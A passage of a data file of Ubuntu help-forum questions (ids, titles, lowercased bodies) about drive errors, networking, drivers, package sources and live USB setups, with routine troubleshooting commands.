100 253 000 old_age offline - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 200 multi_zone_error_rate 0x0008 200 200 000 old_age offline - 0 smart error log version : 1 no errors logged smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline completed without error 00 % 437 - # 2 short offline completed without error 00 % 430 - # 3 extended offline aborted by host 90 % 430 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . it said completed without error . does that mean the drive should be fine or just that the test was able to complete ? should i start a new question as i 'm more concerned about getting the use of the drives back rather than the data/raid array at this point ... well today i was looking through my filesystem to see if there was any data to keep before setting up centos instead . i noticed a folder called dmraid.sil in my home folder . i am guessing this is from when i had initially set up the raid array with the fake raid controller ? i had made sure to remove the device ( quite some time ago way before this problem ) and just before using mdadm to create 'software raid ' . is there any way i have missed a trick somewhere and this was somehow running 'fake ' raid without the device and that is what this dmraid.sil folder is all about ? so confused . there are files in there like sda.size sda_0.dat sda_0.offset etc . any advice on what this folder represents would be helpful . turns out the drives were locked ! i unlocked them easily enough with hdparm command . this is probably what caused all the input output errors . unfortunately i now have this problem : i have managed to mount the md device . is it possible to unplug one drive , format it to a normal drive and copy the data to that ? ive had enough 'fun ' with raid and am going to go down an automated backups route with rsync i think . i want to ask before i do anything that may cause data integrity issues .
247984	gdb can not run due to python error	i am trying to run gdb , but as soon as i hit enter i get this error traceback ( most recent call last ) : file `` /usr/lib/python2.7/site.py '' , line 562 , in < module > main ( ) file `` /usr/lib/python2.7/site.py '' , line 544 , in main known_paths = addusersitepackages ( known_paths ) file `` /usr/lib/python2.7/site.py '' , line 271 , in addusersitepackages user_site = getusersitepackages ( ) file `` /usr/lib/python2.7/site.py '' , line 246 , in getusersitepackages user_base = getuserbase ( ) # this will also set user_base file `` /usr/lib/python2.7/site.py '' , line 236 , in getuserbase user_base = get_config_var ( 'userbase ' ) file `` /usr/lib/python2.7/sysconfig.py '' , line 577 , in get_config_var return get_config_vars ( ) .get ( name ) file `` /usr/lib/python2.7/sysconfig.py '' , line 476 , in get_config_vars _init_posix ( _config_vars ) file `` /usr/lib/python2.7/sysconfig.py '' , line 337 , in _init_posix makefile = _get_makefile_filename ( ) file `` /usr/lib/python2.7/sysconfig.py '' , line 331 , in _get_makefile_filename return os.path.join ( get_path ( 'platstdlib ' ) .replace ( `` /usr/local '' , '' /usr '' ,1 ) , `` config '' + ( sys.pydebug and `` _d '' or `` '' ) , `` makefile '' ) attributeerror : 'module ' object has no attribute 'pydebug' am i missing some package ? i have 12.04 edit : $ file /usr/bin/gdb /usr/bin/gdb : elf 64-bit lsb executable , x86-64 , version 1 ( sysv ) , dynamically linked ( uses shared libs ) , for gnu/linux 2.6.24 , buildid [ sha1 ] =0x8cd6c593fd6ffe6fd72266bf3d3407ea599b8143 , stripped $ dpkg -s /usr/bin/gdb gdb : /usr/bin/gdb
247986	ubuntu server 12.04 : no internet through switch , help	i 've been using ubuntu server 12.04 , upgrading to 12.10 once i figure this out , on my ibm xseries 335 ( name : server1 ; ip : 10.0.0.50 ) as a web server . i recently got a computer from a family friend that i want to set up as a file server ( name : server2 ; ip : 10.0.0.51 ) . i wo n't be able to get an actual network switch for a while so i 've decided to use an old router as a switch . i disabled the router firewall , dhcp server , and public lan . this all works on my regular desktop , i can plug the switch to my router then switch to my pc and i get internet connection . but when i take the switch to my basement , both server1 and server2 do n't receive an internet connection . i 've tried changing resolv.conf , and /etc/network/interfaces . changing neither works . i ca n't even ping my computer , 10.0.0.8 , or the router , 10.0.0.1 . what am i doing wrong ? why do n't my servers receive a lan connection or an internet connection ? please help this is driving me insane . alternatively i 've tried multiple times to set up server1 ( 3 nics ) with internet sharing to server2 ( 1 nic ) . i 've tried several online tutorials on how to do this , and none have worked . i do n't want to try internet sharing anymore . just to be double clear , this is how i need it to be setup : i have looked and looked and tried google 's dns servers , different name servers . i 've been searching google for about a day and nothing has helped me !
247989	whats the best way to turn ubuntu 12.10 to a simple fileserver for backups ?	i have an old rig that i am trying to 1 ) learn linux and terminal/bash 2 ) make it into a simple fileserver so that i can mirror my documents through lan . more specifically i will be using it in an office environment so i can not use dropbox for example since it goes through their servers ( my files are very confidential ) . so i would like dropbox like functionality where a file change on my business machine ( windows 8 ) is mirrored to an ubuntu box . actually i am okay with periodic backup also rather then as soon as i hit `` ctrl s '' it starts a backup - this actually might not be a good idea considering the harddrives are slow and old and running them a lot is just asking for problems and failure . please let me know the easiest root with possible instructions . edit : i think what i am looking for is samba . after i install samba it will give me a readable/writable folder on my linux machine . i will be able to access this location through explorer in windows . my next question is : does there exist a backup software that i can manually type in the folder location ? edit 2 : i believe that syncing to the cloud is also possible as long as the files are being encrypted before they are sent . any way to incorporate this ? thanks
247993	ca n't connect to any wireless connection after updating	i have a dual boot ( windows 7 and ubuntu 12.04 ) setup and , for ( apparently ) no reason , i ca n't connect to any wireless connection on my ubuntu box at all . ( on windows it works . ) i think it stopped working on the first reboot after it has been upgraded ( regular updating via cli apt-get ) . i can still see the connections on the top toolbar but , upon trying to connect to them , i get asked the password and then it tries to connect for about 30 seconds and then times out . after looking for answers on the web i thought that posting the output of sudo lshw -c network would help the people who try to help me : *-network description : wireless interface product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id:0 bus info : pci @ 0000:02:00.0 logical name : eth1 version:01 serial : c0 : f8 : da:08 : c5 : e6 width:64bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=6.20.155.1 ( r326264 ) latency=0 multicast=yes wireless=ieee 802.11abg resources : irq:16 memory : fe500000-fe503fff there is another entry for the ethernet . but i did n't think it 's very relevant to the problem at hand . i have no internet access so i ca n't install stuff from the repos . ( i 'm writing this from a spare netbook i have ) my kernel version is 3.2.0-36-generic-pae in my modprobe.d/blacklist.conf file , i have these lines : # replaced by b43 and ssb blacklist bcm43xx thought it might be relevant . what i have tried so far delete /etc/resolv.conf - did n't work add the following entries to blacklist.conf ( in addition to the ne that was there already ) and reboot : - did n't work either blacklist b43legacy blacklist b43 blacklist bcma blacklist ndiswrapper blacklist wl0 the steps described on this answer - did n't work wither
247994	after changing password , ubuntu wo n't recognize any password	i wanted to change my password and tried to do so in the system settings , but when i clicked the button change , the process froze . i rebooted the computer but after that , i have not been able to use neither the new or old password to change any setting/installing any app . halp ?
247996	boot my mac into external usb ubuntu server 12.10	i recently downloaded ubuntu server 12.10 and created an install disk . i then proceeded to boot into the disk and install the server onto an external usb flash drive . after the installation was complete it ejected the disk and rebooted the computer as normal but through all my efforts i cant boot into the flash drive . i am running a 2011 macbook pro with mountain lion , 4gb of ram , 1tb hard drive , and an intel i7 processor
247997	why does ubuntu music lens display only a few songs and albums ?	the ubuntu music lens displays just a few songs and albums of my music collections . for example the lens displays just 44 albums but it should be 200 albums . if i type the name of the song or album in the search bar then the music lens displays the song , but not in the overview . i edited the id3 tags of the songs with banshee , rhythmbox or easytag but it had no effect . what could i do , that the lens displays all songs and albums ?
247998	how to change default ip in ubuntu 12.10	i just installed ubuntu 12.10 on my pc , and it grabbed an ip address that the network does n't like . i have tried to change it , but to no effect . if anyone could tell me how to do this , i would be very very grateful . i think the problem is in the route , but i have no idea what i 'm doing with internet protocol . note : i know the network works , i had kubuntu on my pc before , but it erred out because i installed an incompatible program . ( did n't know , my fault ) anywho , it connected on kubuntu , and now it does n't want to .
247999	how do i upgrade ubuntu 10.10 to most recent version through virtual machine ?	hello all i am fairly new to ubuntu however i was not able to find an answer to this . i currently run windows 7 through which i run a program called truecrypt . through truecrypt i have created a hidden archive and now i am using vmware oracle to run a virtual machine i have two machines one firewalled with damn small linux and the other running ubuntu 10.10.0 here is my problem although i am currently connected to the internet through this machine when i go to upgrade to current version of ubuntu i get this message w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/source/sources.gz 404 not found w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/natty/main/binary-i386/packages.gz 404 not found e : some index files failed to download , they have been ignored , or old ones used instead . needless to say quite a problem seeing as it does not upgrade a prompt response appreciated thank you .
248006	how can i see the battery status of my logitech wireless mouse ?	is there a way to monitor the mouse 's battery status in kubuntu ? i have a logitech wireless mouse m510 and in windows i can use the default software ( from official site ) to monitor battery status and do other things like editing some mouse buttons etc . is there any software to do same thing or just monitoring battery status ( applets , widgets , software etc . ) ?
248007	ca n't install synaptic or grace on ubuntu 12.10	i 've tried installing through sudo apt-get install and software center for both synaptic and grace ( a plotting tool ) . for sudo apt-get install , i get e : package 'synaptic ' has no installation candidate and for the software center i 'm getting : there is n't a software package called `` grace '' in youc current software sources i have `` main '' , `` universe '' , `` restricted '' , and `` multiverse '' checked for software sources . i 'm an ubuntu noob . thanks !
248014	where 's ubuntu launcher	i downloaded ubuntu . restarted my computer . logged in . and there is my windows desktop just like always . did i miss something ? i do n't know how to get to the launcher that i 'm looking for . any help would be appreciated .
248017	can i do a full-install of ubuntu 12.04 on a usb stick from the usb stick itself ?	i have only one 16 gb fat 32 file system formatted usb drive , pen drive , flash-memory drive , or whatever you wish to call it . i would like to format it from my liveusb distro in memory , and format to ext4 , and finally have the partitions set up ( with the swap space one ) , but i 've had issues with this in the past . i 've gotten error messages , such as : '' ca n't perform action . filesystem is busy , try again later . `` , '' an unknown error as occured . `` , '' the kernel is not responding to the request . `` , '' no root filesystem is defined , correct from partitioning menu . '' i have tried to partition , but i get another giant list of errors that i ca n't even paste here due to a current issue with my processor 's heat dissipation . however , i could not seem to resolve the problems . i have lost pretty much all hope , and i 'd like some feedback on what the real problem behind this might be . the .iso is not bad , the hardware is all working fine , etc. , etc. , etc . why am i getting so many issues ?
248022	md radeon hd 7730m ( dell inspiron 15r special edition )	i can not find the drivers for amd radeon hd 7730m ( dell inspiron 15r special edition ) on the amd website ! can someone please send me the link to download any open source drivers if available ? also the fan does n't stop running when booted into ubuntu ( not the case with windows8 ) . any solutions ? ? thank you ... !
248024	wired or wireless cant connect to internet with acer aspire 5750g	i have problem with connection to internet . i 'm using w8 and it works properly but , when ı turn on ubuntu i 'm pushing fn+f3 ( enabled-disabled ) it says nothing . there are lots of internet connections via wifi . nothing can see my computer when i 'm in ubuntu . is there something wrong with drivers . how can i solve it ?
248026	i want to run android apps on kubuntu 12.04	there are several options including androvm ( well-reviewed ) , icedrobot ( old ? ) , android x86 in virtual box , bluestacks in wine ( yuck ) , and intel 's native x86 android 4.0 emulator in the sdk . are their other options ? which is the best ? i want the android apps to have internet access and i hope for a user experience fairly equal to my phone . i 'm running kubuntu 12.04 amd64 with multiple monitors on an ati card . please advise . thanks !
248031	how can i manually save and restore configuration for iso bootings ?	from time to time i boot from iso files saved in my hard disk . it boots and executes much faster than the live-cd . i would like to save a minimum configuration so that i do n't have to configure it each time . i tried `` rsync -av '' the user 's home and then compressing it to bz2 , but it did n't work well . when i extracted the bz2 it gave me a few errors , even though i copied the extracted files to replace the user 's home but somethings were not configures and the most strange thing was that .gvfs directory appeared without `` w '' permission for the owner ( that is 500 ) . to my surprise not even root can chmod it nor write anything in there . i do n't know the reason , maybe i have to do the backup and/or the restoring of files from out the user . i would like to save mainly : keyboard layout config mouse and touchpad configs wireless settings browser 's bookhemarks and a few other programs ( like terminal ) configurations so that i can easily configure the system the next time i boot from exactly the same iso file . what i did was : rsync -av /home/ubuntu /media/backup ( which is a different partition ) and then tar -jcvf /media/backup/ubuntu-isoconfig.bz2 /media/backup/ubuntu and then extract with the archive manager and replace with rsync . just , for the record , the .gvsf/ directory behaviour : $ ls -dl .gvfs/ dr-x -- -- -- 2 ubuntu ubuntu 0 ene 26 14:43 .gvfs/ $ sudo chmod 700 .gvfs chmod : can not access `.gvfs ' : permission denied ... ... ... ... ... mikewhatever : i have skiped .gvfs and after restoring the original home directory , i only see the backgrouns , the folders and firefox bookmarks restored , not the keyboard nor the network manager sttings which i have done without root permits .
248039	12.10 installation with luks encryption & lvm in efi mode	i try to figure out how to perform an installation of ubuntu 12.10 ( efi mode ) with luks encryption and lvm scheme . what i 've done so far : booted on a gparted live cd 0.14.1-6 in `` efi mode only '' ( in the bios settings ) . created a gpt partition table with gparted created one fat32 partition of 250 mo at the beginning of the disk as `` primary partition '' with `` boot '' flag and `` cylinder align '' with gparted rebooted the pc on an ubuntu 12.10 64 bits dvd in `` efi mode only '' ( same bios settings ) used `` something else '' option for installation type during the partitioning step select my free space and created a `` physical volume for encryption '' . set my key for the encrypted container now i 'm stuck there and ca n't figure out how to : find how to create manually the lvm pysical volume , volume group and logical volumes with this graphic installer determine what shoukld i select for the bootloader ( entire volume , sda_crypt volume ... ) this topic is related to a brand new ubuntu 12.10 installation , i opened a previous one for 12.4.1 installation here
248041	working on files in the cloud	files i wrote on my desktop using 12.04 with libreoffice and saved in word format are in my ubuntu one folder . i thought i could edit them away from home , as i do on sky drive . but when i opened one it only downloaded it to my laptop ( which is using 11.10 and abiword ) . do i have to edit the file and then upload it back to the cloud ? will it then replace the original ?
248043	how to fix semi-random black screen after login ?	apparently i have a problematic gtx580 video card . i followed instructions somewhere and installed ubuntu 12.04 using `` nomodeset '' . then i logged into recovery mode , got the updates , also initiated `` nvidia-current '' package . the problem is i now get black screen instead of desktop ( after normally logging in ) like 30 % of the time . it is quite odd especially when i do n't know what key combination to press in that situation - i just mash my buttons and computer restarts soon ( maybe ctrl+alt+del causes it ? ) . at other times everything is fine , actually i am smoothly typing this message using that very same ubuntu . how should i deal with this problem ? how to act when i see a black screen ? maybe there are error logs somewhere ? thanks !
248049	kicked back to login screen when logging in	so i thought i had finally solved my woes about cinnamon glitching out ( occasionally ) when trying to run full-screen games . i set up an alias for 'sudo service lightdm restart ; sudo startx ' . it worked a few times when something crashed or glitched and i had to ctrl+alt+f2 . but now i seem to have screwed something up , because trying to log in from the lightdm login screen on 12.04 shows a familiar screen with some weirdly indented text , and then kicks me back to the login screen without explanation . i 've tried removing ~/.xauthority and then doing the same command as above , but that did n't work . good thing i left the guest account enabled . any suggestions ? shows what i get for mucking around with things i do n't fully understand . but i 'll try to learn from this .
248053	how can i make a command stay active after a restart to the computer ?	i used a command i saw here to make my touch pad in lenovo 330 to scroll with 2 fingers and it worked exactly as i wanted but after each reset to the computer i need to retype the commend . can you please tell me how i can make this command stay after i close my computer ?
248055	upgrade to 12.04 , mysqld up but ca n't log on	sorry if this is the wrong place to post . i upgraded to 12.04 and mysql stopped working . i re-installed mysql server package . when i try to log on to database i get : error 2002 ( hy000 ) : ca n't connect to local mysql server through socket '/var/run/mysqld/mysqld.sock' that file ( mysqld.sock ) doest not exist . yet mysqld process is up and running . i see it when i go ps -ef . shutdown and restart mysql works fine , i just ca n't log on . i have my database on a directory that is not the default installation data directory . i added my path to the apparmor configuration file .
248056	ca n't install ubuntu using hdmi	i have a dell inspiron 660s with an hdmi monitor . i 'm trying to install ubuntu 12.04 lts , and after i choose `` install ubuntu '' from the boot menu , the screen shuts off and i ca n't see anything . how do i get the ubuntu installer to work with an hdmi monitor ?
248058	toshiba hdd protector accelerometer	my toshiba sattelite laptop supports hdd protector accelerometer ( in the case of free fall it parks the hdd so it does n't harm the data 's integrity ) is there any support for that in linux kernel too ? i have heared that kernel supports ibm drivers but havent heared if it has any support for toshiba ones .
248060	disable usb keyboard wakeup	with the update from 11.04 to 12.04 , my usb keyboard activity will wake ubuntu from 'suspend ' . i 'd like to disable this . ( my battery went dead due to some unexpected keyboard activity . ) this did n't happen in 11.04 . these links talk about usb power ctrl : azitech.wordpress.com/2008/11/27/usbcore-autosuspend/ ubuntuforums.org/showthread.php ? t=1968487 askubuntu.com/questions/165050/usb-wake-not-working-correctly www.ehow.com/how_7536984_configure-power-usb-ubuntu.html www.linuxforums.org/forum/miscellaneous/98253-turn-off-power-usb-port.html www.linuxquestions.org/questions/linux-software-2/howdoi-turn-on-off-usb-light-by-time-514863/ www.linuxquestions.org/questions/debian-26/power-off-usb-509328/ ubuntuforums.org/showthread.php ? t=853179 ubuntuforums.org/showthread.php ? t=1446965 the usb pwrman doc : http : //www.mjmwired.net/kernel/documentation/usb/power-management.txt unfortunately , none offer a solution for me . all my /sys/bus/usb/devices/usbx/wakeup are set to disable . when you get the actual device , those are set to enabled , and are not editable . cat /proc/acpi/wakeup ehc1 s3 *enabled ehc2 s3 *enabled is there another way to disable usb wakeup ?
248061	do all webservers running locally rely on the /etc/hosts file ?	i 'm running the django webserver locally , and i want be able to enter www.my-site.dev or username.my-site.dev and have that map to my django application . i 've seen a lot of solutions for apache , and have tried to add the following to my /etc/hosts file , assuming the django server would also check /etc/hosts . 127.0.0.1:8000 www.my-site.dev 127.0.0.1:8000 username.my-site.dev
248068	can not open websites while e.g . skype works fine 12.04	in ubuntu 12.04 i can not open any websites while e.g . skype works fine or teamviewer and the wired connection is fine since with windows everything works perfectly : ( . i tried to reset firefox or to use chrome and nothing changed . any help is greatly appreciated .
248071	can i install ubuntu without first booting windows 8 ?	i want nothing to do with windows . the only methods i see for installing ubuntu on a windows 8 computer involve booting windows and restarting to change settings . however , this requires first agreeing to windows ' terms of service . i really do n't want to do that if i can avoid it . i have a brand new samsung series 3 notebook . i do n't want to dual-boot , and i do n't want to partition . i want to preemptively scrub away all traces of windows before using my computer . what are my options ?
248072	cant open softwarer center	i click on software center and it opens and closes so i tried to reinstall it in terminal and i get this error how do i fix this ? reading package lists ... error ! e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_quantal-security_universe_binary-i386_packages e : the package lists or status file could not be parsed or opened .
248079	how to install g++ 4.8 ?	i have g++ 4.7.2 on my ubuntu 12.04 and i 'm trying to install 4.8 . i downloaded the file from the gnu repository . after configure and make , i get the following error : collect2 : error : ld returned 1 exit status make [ 3 ] : *** [ build/gengtype ] error 1.. etc . is there any way to install 4.8 on ubuntu ?
248088	have 8.10 ( ibex ? ) i made a 12.10 dvd , how do i install ?	i 've got the 8.10 on an hp probook , have n't really used it ... i made a dvd at work of the 12.10 , which i 'd like to use on it instead ... how do i install it ? it does n't have an internet connection . i have nothing i need to save on the 8.10 , so no worries about it in that regard . thank you in advance !
248089	what is the root password for a live usb stick ?	ubuntu @ ubuntu : ~ $ su password : su : authentication failure i installed ubuntu to a usb stick . i did n't set any password any time - why ca n't i use su ?
248091	i installed chrome as root ; why ca n't i run it either as root or normal user ?	i installed google chrome while logged in as the root user but could n't open it as root . i then logged in via a normal user and tried to start google chrome but again , nothing happens . i am not getting an error message or anything , google chrome just does n't start . any ideas what is causing this issue and how i can fix it ?
248094	how to adjust hdmi overscan on an intel ivy bridge ?	i 'm new to linux and just installed ubuntu 12.10 on my htpc that i just put together . it has a z77 chipset with a intel i3 and intel 2500 graphics . i 'm having an issue with overscan . i have an older dynex 42inch tv that does not let you turn overscan on or off . i ca n't see the top , bottom or sides of the screen due to this and i 've been trying to fix it . i 've seen some stuff about modelines , and kernels , but i 'm so new to this , all i 'm able to do is open the terminal . can someone tell me what to do step by step to get to a point where i can adjust the overscan ?
248108	the 4g/lte huawei e3276 modem does not work on ubuntu 12.10	i installed ubuntu 12.10 on an asus rog laptop g74sx . i have a 4g wireless broadband modem huawei e3276 . when i plug it in the `` enable mobile broadband '' does not appear . when i run lsusb i get the following : bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 001 device 003 : id 0cf3:3005 atheros communications , inc. ar3011 bluetooth bus 001 device 004 : id 1bcf:2885 sunplus innovation technology inc . bus 001 device 005 : id 0bda:0139 realtek semiconductor corp. card reader bus 002 device 003 : id 045e:0773 microsoft corp . bus 002 device 004 : id 152d:0539 jmicron technology corp. / jmicron usa technology corp . bus 002 device 007 : id 12d1:1506 huawei technologies co. , ltd. e398 lte/umts/gsm modem/networkcard ubuntu seems to recognize the modem as huawei e398 . but i can not get it to work . any help will be much appreciated . and please keep your answers as simple as possible .
248110	rebooting problem ubuntu 12.10	so i have unbuntu 12.10 and i have two big problems : first one is everytime i turn on my laptop with ubuntu there is a message that appears for a really sort time saying : no wilbur what does that mean and how to fix it ? second one is i cant reboot ubuntu shutting down and loging out is fine but when i reboot it just freezes with the ubuntu logo . how can i fix this ? thx a lot ! !
248112	lightdm-gtk-greeter power and settings indicator show no icon	i installed ubuntu mini 12.10 and then i did apt-get install lxde-core lightdm-gtk-greeter . i successfully changed the lightdm screen resolution editing the /etc/lightdm/lightdm.conf and adding display-setup-script=xrandr -s 1280x720 . how to add an image for the power and settings icons in the lightdm-gtk-greeter screen ? right now , it looks like this :
248118	ubuntu on usb : practical solution ?	i 'm trying to make a usb boot ubuntu for day-to-day operation . not live necessarily , but certainly to : persist changes ( including local document store ) password-protected logins ( though single user ) minimal damage to usb blocks i 'm not looking to run a machine off of this 24/7 , just to use as an alternate boot os for sitting in hotels with company laptop of an evening ; i do n't want my stuff left on their platters . persisting changes can be covered by the likes of unetbootin and universal usb installer , this much i have gathered . secured login though appears to be an issue under such solutions as there is no authentication on these live instances - even creating a new user does not counter this as ( i found ) the system simply auto logs into the new user and you ca n't disable this feature - relevant controls are grayed out . how can i disable automatic login on a liveusb ? using the above as a guide i stoved my first live usb as the entries in the post do not match the 12.10 file content and adding the additional line appears to be the breaking change ; i added it , the install broke . onto usb life-span - i found a rather in depth article and no doubt to some it all makes perfect sense but to be honest i struggled with it , which goes into some detail including the mention of virtual partitions for high read-write processes that are not persistence critical : http : //www.systemateka.com/usbboot.html in contrast to that there are of course ( again ) the stand-alone applications like unetbootin and universal usb installer , but none of them seem to breach whether or not they make use of tmpfs for data that does not need to be persisted , logs , apt cache etc and nor do they state if the file system is set out in a way to preserve the usb - the use of swap partitions is pointless on a stick . so in short , can anyone layout or point me in the the direction of simple steps to achieve my requirements ? i say simple.. i 'm not a complete simpleton , but editing files is simple , copying text is simple , replacing values is simple ... running scripts is less simple and if ubuntu and the linux community want windows dead , there 's still a lot to be done to make the life of a casual linux user , such as i , easy . would also be interested in assisting writing such a guide if someone has the know-how and the inclination ; i can document processes given sufficient info : ) thanks
248119	is there a way to add close buttons to the scale mode ?	i have just moved back from linux mint 14 cinnamon to ubuntu 12.04 . in linux mint 14 the scale mode puts an x next to each window and gives the option to close them one by one in scale mode . can i add the close mode with compiz settings manager in ubuntu 12.04 ?
248124	how can i get my keyboard to load sooner ?	i 'm not sure if i 'm wording this correctly , or if it 's even possible , but is there any way to make my keyboard available sooner ? i can use it once ubuntu 's purple screen comes up , but i ca n't use it to get into bios . is there a command or a document that controls this ?
248127	extracting data from mac os resource forks	i have some data in old mac os resource forks/files that i would like to resurrect . what tools exist on linux that would allow me to peruse and extract individual resources from the resource forks of old mac os files ? i did some digging and found rezycle and rezilla for mac os , but i 'd like to stay on linux if at all possible . suggestions ?
248131	does the 12.10 wubi install work with windows xp sp3 ?	i did a fresh installation of xp sp3 on an ibm thinkpad t40 , 512 mb of ram , pentium m 1.5 ghz processor . i ran the wubi executable for 12.10 and let it download and unpack the image . when it said i needed to reboot the computer to complete the installation , i let wubi restart it . during the reboot , it never came up to the boot menu and just booted into windows . when i check the startup options in system properties and choose the option to edit the boot.ini from there , i found this : [ operating systems ] multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows= '' microsoft windows xp professional '' /fastdetect /noexecute=optin [ boot loader ] timeout=5 default=multi ( 0 ) disk ( 0 ) rdisk ( 0 ) partition ( 1 ) \windows i thought there might have been a problem with the .iso that wubi pulled down , so i manually downloaded the .iso and put it in the same folder as wubi and ran the installation again with the same results after the reboot . i had previously installed lucid on this machine before deciding to reinstall xp and use wubi to dual boot the latest and greatest version . any ideas ? i 've used wubi on other laptops with no problems .
248133	how to download sources for sudo ?	i would like to get the sources for sudo and i found out that i am suppose to use sudo apt-get source sudo , but then it says it does not find any sources ( even though i have told the software manager that it can download sources from the internet ) or that my /etc/apt/sources.list is empty . now , to add a new source repository i need the apt line format . but i only have a link for the package ( there is this page containing many links http : //www.sudo.ws/sudo/download.html # source ) . how do i make an apt line out of a link ? i know the apt format , but how do i find out what to put in front and after the link ? how do i actually grab the sources for sudo ( the linux way ; not directly from their website ) ?
248134	ubuntu install is not recognizing my other os ( windows 8 )	i am new to linux and am excited to get started . however , i do not want to replace windows 8 , i would like to simply have two operating systems . i am installing from a flash drive . when i start my computer , i go into the bios , select sandisk , select install ubuntu , and then it works . it does not , however , recognize my other os and just wants to replace everything . why is it doing this and how do i fix it ?
248143	my keyboard is bugging out on 12.04 ubuntu	i have a saitek eclipse 2 keyboard you can switch lights from blue to red to purple to nonw . however , when ever i change the colour on it , it changes color yet it also does some strange command . it , i believe , left clicks or right cliks , or a combination of the two when i change colors . it also sumtimes makes my screen freezes . why is this happening ? to i need to update my drivers or sumthing ? because i think i updated all my drivers with installation . and theabove problem do not happen on windows 7
248144	what happen when 'unable to resolve host ' still exist on terminal ?	after editing etc/hosts and hostname , 'unable to resolve host ' still exist on my terminal , i still do n't know what is the cause . although my computer and my terminal runs so well . i 'm only using single os ubuntu 12.04.1
248146	error 503 : packages.gz naming problem	here is the detailed information ( i have choosen the best source server ) : w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/universe/binary-amd64/packages 503 , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/main/binary-amd64/packages 503 , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/universe/binary-i386/packages 503 , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/precise-security/main/binary-i386/packages 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise/main/source/sources 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise/universe/source/sources 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise/main/binary-amd64/packages 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise/universe/binary-amd64/packages 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise/main/binary-i386/packages 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise/universe/binary-i386/packages 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise-security/universe/source/sources 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise-security/main/source/sources 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise-updates/universe/source/sources 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise-updates/main/source/sources 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise-updates/universe/binary-amd64/packages 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise-updates/main/binary-amd64/packages 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise-updates/universe/binary-i386/packages 503 , w : failed to fetch http : //ubuntu.cn99.com/ubuntu/dists/precise-updates/main/binary-i386/packages 503 , e : some index files failed to download . they have been ignored , or old ones used instead . notice : http : //security.ubuntu.com/ubuntu/dists/precise-security/universe/binary-amd64/packages is not a valid url and i can easily access http : //security.ubuntu.com/ubuntu/dists/precise-security/universe/binary-amd64/packages.gz from firefox or command line ( like wget ) without a proxy . also i have tired one solution described here : answers.launchpad.net/ubuntu/+source/update-manager/+question/155500 hippo @ dellsys : ~ $ cat /etc/apt/sources.list # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / dists/oneiric/main/binary-i386/ # deb cdrom : [ ubuntu 11.10 _oneiric ocelot_ - release amd64 ( 20111012 ) ] / oneiric main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # deb http : //ubuntu.cn99.com/ubuntu/ quantal main restricted multiverse # deb-src http : //ubuntu.cn99.com/ubuntu/ quantal restricted main universe multiverse # added by software-properties # # major bug fix updates produced after the final release of the # # distribution . # deb http : //ubuntu.cn99.com/ubuntu/ quantal-updates main restricted multiverse # deb-src http : //ubuntu.cn99.com/ubuntu/ quantal-updates restricted main universe multiverse # added by software-properties # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # deb http : //ubuntu.cn99.com/ubuntu/ quantal universe # deb http : //ubuntu.cn99.com/ubuntu/ quantal-updates universe # # wxwidgets part # deb http : //apt.wxwidgets.org/ natty-wx main # disabled on upgrade to quantal # deb-src http : //apt.wxwidgets.org/ natty-wx main # disabled on upgrade to quantal # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //ubuntu.cn99.com/ubuntu/ quantal-security main restricted multiverse # deb-src http : //ubuntu.cn99.com/ubuntu/ quantal-security restricted main universe multiverse # added by software-properties # deb http : //ubuntu.cn99.com/ubuntu/ quantal-security universe # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu oneiric partner # deb-src http : //archive.canonical.com/ubuntu oneiric partner # xbmc 